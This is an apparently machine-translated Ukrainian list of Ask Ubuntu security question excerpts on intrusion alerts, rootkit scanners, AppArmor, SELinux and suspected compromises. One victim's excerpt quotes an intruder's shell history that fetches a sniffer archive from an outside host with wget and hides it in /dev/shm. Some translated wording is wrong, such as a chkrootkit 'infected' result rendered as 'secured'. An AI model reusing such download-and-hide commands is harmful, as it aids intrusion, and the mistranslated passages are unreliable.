Запитання з тегом «security»

Я використовую Linux досить довгий час, і я завжди відчуваю необхідність встановити пасивне налаштування програмного забезпечення / скрипту, яке може попереджати мене про будь-які підозрілі мережеві дії, такі як сканування, невдалі спроби входу в систему, електронною поштою або електронною поштою. візуальні / аудіоповідомлення. Я знаю, як шукати журнали та інше, …

27 software-recommendation  security  firewall  logs 

Не вдається знайти жодного безкоштовного постачальника VPN для Ubuntu. Я спробував розглянути старі питання, але вони здаються застарілими.

27 security  vpn  privacy 

Нещодавно я придбав Yubikey Neo - чудовий маленький апаратний пристрій аутентифікації другого фактора. Він в першу чергу призначений для використання з одноразовими паролями та новим протоколом U2F, але, оскільки версія Yubikey 2, вона також підтримує аутентифікацію HMAC-SHA1 виклик-відповідь. HMAC-SHA1 поєднує секретний ключ (зберігається всередині Yubikey) і поєднує це із парольною …

27 password  security  encryption  luks  yubikey 

У моїй корпоративній політиці зазначено, що поля Linux повинні бути захищені SELinux (щоб аудитор безпеки міг встановити прапорець "так, ми надзвичайно безпечні!" Для кожного сервера). Я сподівався скористатися дивовижною безпекою AppArmor за замовчуванням Ubuntu. Нерозумно запускати і Apparmor, і SELinux? (Якщо так, то чи можна цю погану ідею пом'якшити за …

27 security  permissions  apparmor 

Я на 99,9% впевнений, що моя система на моєму персональному комп’ютері проникла. Дозвольте спочатку дати свої міркування, щоб ситуація стала зрозумілою: Приблизний графік підозрілої діяльності та вжитих подальших дій: 4-26 23:00 Я закінчив усі програми і закрив ноутбук. 4-27 12:00 Я відкрив свій ноутбук після того, як він був у …

25 ssh  security  passwd-file 

Сканування chkrootkit показує, що "tcpd" є ЗАБЕЗПЕЧЕНО. Хоча сканування rkhunter показує нормально (за винятком звичайних помилкових позитивів) Чи повинен я хвилюватися? (Я на Ubuntu 16.10 з 4.8.0-37-generic)

25 security  malware  rootkit  tcpdump  chkrootkit 

Я знаю, що пароль sudo захищає мій комп'ютер від локального злому того, хто має фізичний доступ до нього ( редагувати: насправді, це не так ). Мій пароль досить сильний для цієї мети, але я знаю, що він недостатньо сильний, якщо хтось може його віддалено змусити. Чи може хтось отримати доступ …

25 password  sudo  security 

Як і 99% користувачів, я встановлюю Ubuntu з готових бінарних файлів. Як я можу переконатися, що ці бінарні файли насправді є вихідним вихідним кодом від Ubuntu? Було б добре переконатися, що NSA / хтось не співпрацював ні з Ubuntu, ні з Linode (мій постачальник VPS), щоб возитися з бінарними файлами. …

25 security 

Чи постачається Ubuntu з попередньо встановленим або автоматичним брандмауером? Якщо ні, то мені потрібен? Я прочитав деякі статті про переваги Linux над іншими операційними системами щодо безпеки (не потрібно мати антивірус, ...), але хотів би бути впевненим.

25 security  firewall 

Я працюю на Ubuntu 10.04.1 LTS. Я запускаю rkhunter, щоб перевірити наявність руткітів. rkhunter скаржиться на такі приховані файли та каталоги. Я думаю, що ці файли не є справжньою проблемою в моїй системі, але як я можу перевірити, чи є ці файли законними файлами? [07:57:45] Checking for hidden files and …

25 10.04  security  rkhunter 

Вчора я перевірив свою історію команд на своєму VServer. Я знайшов кілька підозрілих рядків. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . …

24 ssh  security  malware 

Я намагаюся зрозуміти do-release-upgradeпроцес, тобто спосіб, який Ubuntu спонукає мене перейти до наступного весняного чи осіннього випуску Ubuntu. Прочитавши джерела, ubuntu-release-upgraderя знайшов файл / etc / update-manager / meta-release у своїй системі. Цей файл, використовуючи URL-адресу HTTP, вказує на http://changelogs.ubuntu.com/meta-release, де перераховані різні версії Ubuntu від Warty 04.10 до Raring …

24 security  do-release-upgrade 

Деякі питання, на які я хочу відповісти: Як дізнатись, чи працює програма apparmor? Як я можу зрозуміти, чи працює він добре?

24 security  apparmor 

Я розумію, що якщо будь-яке зловмисне програмне забезпечення потрапляє в систему Linux, воно, як мінімум, отримає привілей на рівні користувача та зруйнує все, що знаходиться в межах досяжності конкретного користувача, тобто власні файли користувача. Але що саме утримує від шкідливих програм доступ до кореневого доступу? Чи не може він якось …

24 security 

У системі RedHat / CentOS я можу перевірити встановлені RPM в моїй системі за допомогою rpm -V . Що таке Ubuntu або aptеквівалент цієї команди?

24 security  apt  rpm  deb